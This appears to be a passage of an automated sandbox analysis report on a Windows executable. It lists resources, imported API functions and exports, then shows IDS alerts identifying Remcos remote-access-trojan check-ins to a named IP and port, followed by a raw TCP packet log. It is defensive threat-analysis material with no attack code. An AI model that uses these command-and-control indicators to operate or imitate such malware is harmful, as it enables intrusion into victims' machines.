RT_BITMAP	0x10e578	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Korean	South Korea	0.44565217391304346
RT_BITMAP	0x10e630	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Korean	North Korea	0.37962962962962965
RT_BITMAP	0x10e630	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Korean	South Korea	0.37962962962962965
RT_ICON	0x10e774	0x44028	Device independent bitmap graphic, 256 x 512 x 32, image size 262144			0.2361111111111111
RT_ICON	0x15279c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors	Korean	North Korea	0.34543010752688175
RT_ICON	0x15279c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512, 16 important colors	Korean	South Korea	0.34543010752688175
RT_ICON	0x152a84	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	Korean	North Korea	0.543918918918919
RT_ICON	0x152a84	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	Korean	South Korea	0.543918918918919
RT_MENU	0x152bac	0x142	data	Korean	North Korea	0.6149068322981367
RT_MENU	0x152bac	0x142	data	Korean	South Korea	0.6149068322981367
RT_DIALOG	0x152cf0	0xc6	data	Korean	North Korea	0.6919191919191919
RT_DIALOG	0x152cf0	0xc6	data	Korean	South Korea	0.6919191919191919
RT_DIALOG	0x152db8	0xda	data	Korean	North Korea	0.7477064220183486
RT_DIALOG	0x152db8	0xda	data	Korean	South Korea	0.7477064220183486
RT_DIALOG	0x152e94	0xf4	data	Korean	North Korea	0.6639344262295082
RT_DIALOG	0x152e94	0xf4	data	Korean	South Korea	0.6639344262295082
RT_STRING	0x152f88	0x34	data	Korean	North Korea	0.5576923076923077
RT_STRING	0x152f88	0x34	data	Korean	South Korea	0.5576923076923077
RT_STRING	0x152fbc	0x66	data	Korean	North Korea	0.8627450980392157
RT_STRING	0x152fbc	0x66	data	Korean	South Korea	0.8627450980392157
RT_STRING	0x153024	0x2e	data	Korean	North Korea	0.6086956521739131
RT_STRING	0x153024	0x2e	data	Korean	South Korea	0.6086956521739131
RT_STRING	0x153054	0xe8	data	Korean	North Korea	0.75
RT_STRING	0x153054	0xe8	data	Korean	South Korea	0.75
RT_STRING	0x15313c	0x30c	data	Korean	North Korea	0.591025641025641
RT_STRING	0x15313c	0x30c	data	Korean	South Korea	0.591025641025641
RT_STRING	0x153448	0x1a8	data	Korean	North Korea	0.4080188679245283
RT_STRING	0x153448	0x1a8	data	Korean	South Korea	0.4080188679245283
RT_STRING	0x1535f0	0x1d2	data	Korean	North Korea	0.5815450643776824
RT_STRING	0x1535f0	0x1d2	data	Korean	South Korea	0.5815450643776824
RT_STRING	0x1537c4	0x68	data	Korean	North Korea	0.8076923076923077
RT_STRING	0x1537c4	0x68	data	Korean	South Korea	0.8076923076923077
RT_STRING	0x15382c	0x6e	data	Korean	North Korea	0.6272727272727273
RT_STRING	0x15382c	0x6e	data	Korean	South Korea	0.6272727272727273
RT_STRING	0x15389c	0xb0	data	Korean	North Korea	0.7102272727272727
RT_STRING	0x15389c	0xb0	data	Korean	South Korea	0.7102272727272727
RT_STRING	0x15394c	0x322	AmigaOS bitmap font "X\271", fc_YSize 28844, 9414 elements, 2nd "\030\264\310\305\265\302\310\262\344\262.", 3rd " "	Korean	North Korea	0.4975062344139651
RT_STRING	0x15394c	0x322	AmigaOS bitmap font "X\271", fc_YSize 28844, 9414 elements, 2nd "\030\264\310\305\265\302\310\262\344\262.", 3rd " "	Korean	South Korea	0.4975062344139651
RT_STRING	0x153c70	0x172	AmigaOS bitmap font "X\271", fc_YSize 29895, 9414 elements, 2nd "\210\307\265\302\310\262\344\262.", 3rd	Korean	North Korea	0.5675675675675675
RT_STRING	0x153c70	0x172	AmigaOS bitmap font "X\271", fc_YSize 29895, 9414 elements, 2nd "\210\307\265\302\310\262\344\262.", 3rd	Korean	South Korea	0.5675675675675675
RT_STRING	0x153de4	0x24	data	Korean	North Korea	0.4722222222222222
RT_STRING	0x153de4	0x24	data	Korean	South Korea	0.4722222222222222
RT_STRING	0x153e08	0x40	data	Korean	North Korea	0.671875
RT_STRING	0x153e08	0x40	data	Korean	South Korea	0.671875
RT_RCDATA	0x153e48	0x9c27a	Delphi compiled form 'TdmMain'			0.18977814605775395
RT_RCDATA	0x1f00c4	0x7cf06	Delphi compiled form 'TFilePropertiesForm2'			0.3699384465070835
RT_MESSAGETABLE	0x26cfcc	0x2840	data			0.32278726708074534
RT_MESSAGETABLE	0x26f80c	0x2840	data			0.4297360248447205
RT_MESSAGETABLE	0x27204c	0x2840	data			0.32754270186335405
RT_GROUP_CURSOR	0x27488c	0x22	Lotus unknown worksheet or configuration, revision 0x2	Korean	North Korea	1.0294117647058822
RT_GROUP_CURSOR	0x27488c	0x22	Lotus unknown worksheet or configuration, revision 0x2	Korean	South Korea	1.0294117647058822
RT_GROUP_CURSOR	0x2748b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2748c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748c4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2748d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748d8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2748ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2748ec	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274900	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274900	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274914	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274914	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274928	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274928	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x27493c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x27493c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274950	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274950	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274964	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274964	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x274978	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x274978	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x27498c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x27498c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2749a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2749a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_CURSOR	0x2749b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	North Korea	1.3
RT_GROUP_CURSOR	0x2749b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Korean	South Korea	1.3
RT_GROUP_ICON	0x2749c8	0x22	data	Korean	North Korea	1.0
RT_GROUP_ICON	0x2749c8	0x22	data	Korean	South Korea	1.0
RT_VERSION	0x2749ec	0x2ec	data	Korean	North Korea	0.48663101604278075
RT_VERSION	0x2749ec	0x2ec	data	Korean	South Korea	0.48663101604278075
RT_ANIICON	0x274cd8	0x59eeb	PC bitmap, Windows 3.x format, 46643 x 2 x 43, image size 368699, cbSize 368363, bits offset 54			0.948387867402535
RT_ANIICON	0x2cebc4	0x39e54	PC bitmap, Windows 3.x format, 29965 x 2 x 41, image size 237438, cbSize 237140, bits offset 54			0.9939613730285907

Imports

DLL	Import
WS2_32.dll	inet_addr, closesocket, getsockname, send, recv, connect, WSAStartup, gethostbyname, bind, setsockopt, WSACleanup, socket, WSARecv, WSASend, WSACloseEvent, inet_ntoa, WSASocketA, htons, WSAEventSelect, WSACreateEvent, listen, htonl, WSAGetLastError, WSAResetEvent, accept
ODBC32.dll
KERNEL32.dll	FreeLibrary, GlobalAlloc, GlobalLock, GlobalAddAtomA, InterlockedDecrement, FreeResource, GlobalFree, GlobalUnlock, lstrcmpW, lstrcatA, GlobalFindAtomA, GlobalGetAtomNameA, SetLastError, MulDiv, FindClose, FindNextFileA, FileTimeToSystemTime, FileTimeToLocalFileTime, FindFirstFileA, GetPrivateProfileIntA, WritePrivateProfileStringA, GetPrivateProfileStringA, InterlockedIncrement, GlobalFlags, LocalAlloc, LocalFree, GlobalReAlloc, GlobalDeleteAtom, TlsGetValue, TlsAlloc, TlsSetValue, LocalReAlloc, TlsFree, FormatMessageA, GlobalSize, CopyFileA, MoveFileA, FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, GetFileSize, DuplicateHandle, GetVolumeInformationA, GetFullPathNameA, GetShortPathNameA, GetCPInfo, GetOEMCP, SystemTimeToFileTime, SetErrorMode, LocalFileTimeToFileTime, SetFileTime, SetFileAttributesA, GetFileAttributesA, GetFileTime, LocalUnlock, LocalLock, GetTempFileNameA, GetDiskFreeSpaceA, ExitThread, GetTimeFormatA, GetDateFormatA, VirtualProtect, RtlUnwind, GetDriveTypeA, GetStartupInfoA, GetCommandLineA, SetLocalTime, TerminateProcess, HeapSize, QueryPerformanceCounter, UnhandledExceptionFilter, GetTimeZoneInformation, LCMapStringA, LCMapStringW, FatalAppExitA, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetConsoleCtrlHandler, GetStringTypeA, GetStringTypeW, SetStdHandle, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, IsBadReadPtr, IsBadCodePtr, GetLocaleInfoW, SetEnvironmentVariableA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, LoadLibraryA, CreateThread, UnregisterWaitEx, FlushInstructionCache, GetCurrentDirectoryA, SetCurrentDirectoryA, lstrcpynA, ReleaseMutex, ReleaseSemaphore, CreateSemaphoreA, IsDBCSLeadByte, CreateDirectoryA, SetThreadIdealProcessor, GetQueuedCompletionStatus, WaitForMultipleObjects, PostQueuedCompletionStatus, GetTickCount, SetEvent, SetProcessPriorityBoost, CreateEventA, CreateIoCompletionPort, SwitchToThread, Sleep, HeapReAlloc, VirtualAlloc, HeapValidate, HeapAlloc, VirtualFree, HeapFree, HeapCreate, HeapDestroy, OutputDebugStringA, SuspendThread, ResumeThread, IsDebuggerPresent, DebugBreak, IsBadWritePtr, GetSystemTimeAsFileTime, SetThreadPriority, GetCurrentProcessId, WriteFile, SetFilePointer, GetLocalTime, GetCurrentThreadId, VirtualQuery, GetCurrentProcess, GlobalMemoryStatus, CreateFileA, ReadFile, MoveFileExA, DeleteFileA, SetUnhandledExceptionFilter, GetCurrentThread, GetThreadContext, GetSystemInfo, GetModuleHandleA, lstrcmpA, lstrlenA, lstrcmpiA, lstrcmpiW, GetStringTypeExA, GetStringTypeExW, lstrlenW, CompareStringA, CompareStringW, GetEnvironmentVariableA, MultiByteToWideChar, GetEnvironmentVariableW, GetVersion, DeleteTimerQueueTimer, lstrcpyA, LoadResource, LockResource, SizeofResource, FindResourceA, WideCharToMultiByte, GetThreadLocale, GetLocaleInfoA, GetACP, GetVersionExA, InterlockedExchange, RaiseException, WaitForSingleObject, CreateMutexA, GetLastError, CloseHandle, GetModuleFileNameA, ExitProcess, DeleteCriticalSection, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, GlobalHandle
USER32.dll	BringWindowToTop, SetRectEmpty, CreatePopupMenu, InsertMenuItemA, LoadAcceleratorsA, LoadMenuA, ReuseDDElParam, UnpackDDElParam, IsClipboardFormatAvailable, MessageBeep, SetRect, GetTabbedTextExtentA, IsRectEmpty, UnionRect, GetDCEx, LockWindowUpdate, GetSystemMenu, SetParent, SetMenu, TranslateAcceleratorA, DestroyMenu, GetMenuItemInfoA, InflateRect, GetDialogBaseUnits, DestroyIcon, GetSysColorBrush, GetMenuStringA, AppendMenuA, RemoveMenu, InsertMenuA, DeleteMenu, WaitMessage, GetWindowThreadProcessId, ReleaseCapture, WindowFromPoint, SetCapture, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, ScrollWindowEx, IsDialogMessageA, IsDlgButtonChecked, SetDlgItemTextA, SetDlgItemInt, GetDlgItemTextA, GetDlgItemInt, CheckRadioButton, CheckDlgButton, RegisterWindowMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, IsChild, GetWindowTextLengthA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, TrackPopupMenuEx, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, SetWindowPlacement, GetDlgCtrlID, SetWindowPos, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, PtInRect, GetWindow, MapVirtualKeyA, GetKeyNameTextA, CopyRect, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, IsWindow, GetDlgItem, GetNextDlgTabItem, UnhookWindowsHookEx, SetMenuItemBitmaps, GetFocus, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, ValidateRect, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, ShowOwnedPopups, SetCursor, MsgWaitForMultipleObjects, wvsprintfA, wsprintfA, GetParent, UnregisterClassA, CharUpperA, CharUpperW, CharLowerA, CharLowerW, EnableWindow, IsIconic, GetSystemMetrics, DrawIcon, EndDialog, GetAsyncKeyState, GetWindowTextA, CallWindowProcA, GetDC, ReleaseDC, GetClientRect, SetScrollInfo, GetScrollInfo, ScrollWindow, BeginPaint, EndPaint, SetWindowLongA, MoveWindow, SetFocus, DialogBoxParamA, PostMessageA, KillTimer, InvalidateRect, SendMessageA, SetTimer, DefWindowProcA, MessageBoxA, DestroyWindow, PostQuitMessage, CreateWindowExA, SetWindowTextA, ShowWindow, UpdateWindow, LoadIconA, LoadCursorA, RegisterClassExA, LoadStringA, GetMessageA, TranslateMessage, DispatchMessageA, GetCursorPos
GDI32.dll	CopyMetaFileA, CreateDCA, GetTextExtentPoint32A, CreateFontIndirectA, SetRectRgn, CombineRgn, GetMapMode, DPtoLP, CreateCompatibleBitmap, GetCharWidthA, StretchDIBits, CreateFontA, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, GetBkColor, CreateHatchBrush, GetObjectType, PlayMetaFileRecord, SelectPalette, GetStockObject, CreateCompatibleDC, CreatePatternBrush, CreateDIBPatternBrushPt, DeleteDC, ExtSelectClipRgn, PolyBezierTo, PolylineTo, PolyDraw, ArcTo, CreateSolidBrush, GetCurrentPositionEx, ExtCreatePen, CreatePen, GetDeviceCaps, ExtTextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, SelectClipPath, CreateRectRgn, GetClipRgn, SelectClipRgn, DeleteObject, SetColorAdjustment, SetArcDirection, SetMapperFlags, SetTextCharacterExtra, SetTextJustification, SetTextAlign, MoveToEx, LineTo, OffsetClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, RestoreDC, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SaveDC, GetObjectA, SetBkColor, GetClipBox, GetDCOrgEx, PatBlt, CreateRectRgnIndirect, CreateBitmap, SetTextColor, TextOutA, EnumMetaFile, GetTextMetricsA, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, PlayMetaFile
comdlg32.dll	ReplaceTextA, FindTextA, PageSetupDlgA, GetOpenFileNameA, CommDlgExtendedError, GetSaveFileNameA, GetFileTitleA, PrintDlgA
WINSPOOL.DRV	GetJobA, DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll	StartServiceA, RegCloseKey, RegQueryValueExA, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegOpenKeyExA, StartServiceCtrlDispatcherA, OpenSCManagerA, CloseServiceHandle, GetFileSecurityA, SetFileSecurityA, RegCreateKeyA, RegSetValueA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, SetServiceStatus, RegisterServiceCtrlHandlerA, ControlService, GetUserNameA, QueryServiceStatus, QueryServiceConfigA, QueryServiceConfig2A, LockServiceDatabase, ChangeServiceConfigA, ChangeServiceConfig2A, UnlockServiceDatabase, QueryServiceLockStatusA, OpenServiceA, DeleteService, CreateServiceA
SHELL32.dll	ExtractIconA, SHGetFileInfoA, DragFinish, DragQueryFileA
COMCTL32.dll	ImageList_Read, ImageList_Write, ImageList_Destroy, ImageList_Create, ImageList_LoadImageA, ImageList_Merge, ImageList_Draw, ImageList_GetImageInfo
SHLWAPI.dll	HashData, PathFindExtensionA, PathRemoveExtensionA, PathStripToRootA, PathIsUNCA, PathFindFileNameA, PathRemoveFileSpecA
ole32.dll	WriteFmtUserTypeStg, SetConvertStg, WriteClassStg, OleRegGetUserType, ReadClassStg, StringFromCLSID, CoTreatAsClass, CoTaskMemFree, CreateBindCtx, CoTaskMemAlloc, ReleaseStgMedium, OleDuplicateData, CoDisconnectObject, CoCreateInstance, StringFromGUID2, CLSIDFromString, ReadFmtUserTypeStg
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysStringLen, SysAllocStringByteLen, SysStringByteLen, VarBstrFromDate, VarBstrFromCy, VarCyFromStr, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SysFreeString, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayCreate, SafeArrayRedim, VariantCopy, SafeArrayAllocData, SafeArrayAllocDescriptor, SafeArrayCopy, SafeArrayGetElement, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayLock, SafeArrayUnlock, SafeArrayDestroy, SafeArrayDestroyData, SafeArrayDestroyDescriptor, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocString, SysReAllocStringLen, VarDateFromStr, VarBstrFromDec, VarDecFromStr, SafeArrayGetLBound
WSOCK32.dll	getsockopt, shutdown

Exports

Name	Ordinal	Address
??0CSingleLock@GeoBase@@QAE@PAVCSyncObject@1@H@Z	1	0x466ff0
??1CSingleLock@GeoBase@@QAE@XZ	2	0x401030
??4CSingleLock@GeoBase@@QAEAAV01@ABV01@@Z	3	0x401000
?IsLocked@CSingleLock@GeoBase@@QAEHXZ	4	0x401050
?Lock@CSingleLock@GeoBase@@QAEHK@Z	5	0x467030
?Unlock@CSingleLock@GeoBase@@QAEHJPAJ@Z	6	0x4670a0
?Unlock@CSingleLock@GeoBase@@QAEHXZ	7	0x467060

Possible Origin

Language of compilation system	Country where language is spoken	Map
Korean	North Korea
Korean	South Korea

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T17:40:06.529888+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49851	181.131.217.244	1842	TCP
2024-12-12T17:40:17.719004+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49876	181.131.217.244	1842	TCP
2024-12-12T17:40:21.209783+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49883	181.131.217.244	1842	TCP
2024-12-12T17:40:26.974691+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49899	181.131.217.244	1842	TCP
2024-12-12T17:40:35.739867+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49919	181.131.217.244	1842	TCP
2024-12-12T17:40:39.089013+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49929	181.131.217.244	1842	TCP
2024-12-12T17:40:50.246375+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.2.7	49955	181.131.217.244	1842	TCP
2024-12-12T17:40:51.523614+0100	2032777	ET MALWARE Remcos 3.x Unencrypted Server Response	1	181.131.217.244	1842	192.168.2.7	49955	TCP
2024-12-12T17:40:53.735775+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	49962	178.237.33.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:39:26.344511986 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:26.464337111 CET	30203	49758	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:26.464457035 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:26.517276049 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:26.763603926 CET	30203	49758	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:26.763674974 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:26.885723114 CET	30203	49758	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:27.866822958 CET	30203	49758	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:27.913772106 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:28.103023052 CET	30203	49758	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:28.125648022 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:28.245812893 CET	30203	49758	181.131.217.244	192.168.2.7
Dec 12, 2024 17:39:28.248979092 CET	49758	30203	192.168.2.7	181.131.217.244
Dec 12, 2024 17:39:28.488482952 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:28.488533974 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:28.488600969 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:28.511708021 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:28.511739969 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.109914064 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.110065937 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:30.113461018 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:30.113478899 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.113739014 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.163743019 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:30.218502998 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:30.259367943 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.798049927 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.798073053 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.798135042 CET	443	49764	185.166.143.50	192.168.2.7
Dec 12, 2024 17:39:30.798135996 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:30.798211098 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:30.798212051 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:31.094366074 CET	49764	443	192.168.2.7	185.166.143.50
Dec 12, 2024 17:39:31.445986032 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:31.446037054 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:31.446100950 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:31.446530104 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:31.446544886 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:32.873109102 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:32.873251915 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:32.875325918 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:32.875338078 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:32.875612974 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:32.877866983 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:32.923332930 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.342916965 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.393114090 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.393147945 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.396970034 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.397015095 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.398192883 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.576361895 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.576437950 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.576534033 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.576605082 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.576642036 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.576657057 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.630888939 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.630980015 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.631056070 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.631092072 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.631113052 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.638653040 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.640990973 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.641004086 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.695045948 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.750597000 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.750613928 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.750648975 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.750667095 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.750756025 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.750793934 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.750817060 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.752964020 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.757128954 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.791066885 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.791120052 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.791165113 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.791198015 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.791210890 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.791265011 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.796096087 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.796189070 CET	49770	443	192.168.2.7	54.231.193.17
Dec 12, 2024 17:39:33.832562923 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.832577944 CET	443	49770	54.231.193.17	192.168.2.7
Dec 12, 2024 17:39:33.832617044 CET	443	49770	54.231.193.17	192.168.2.7
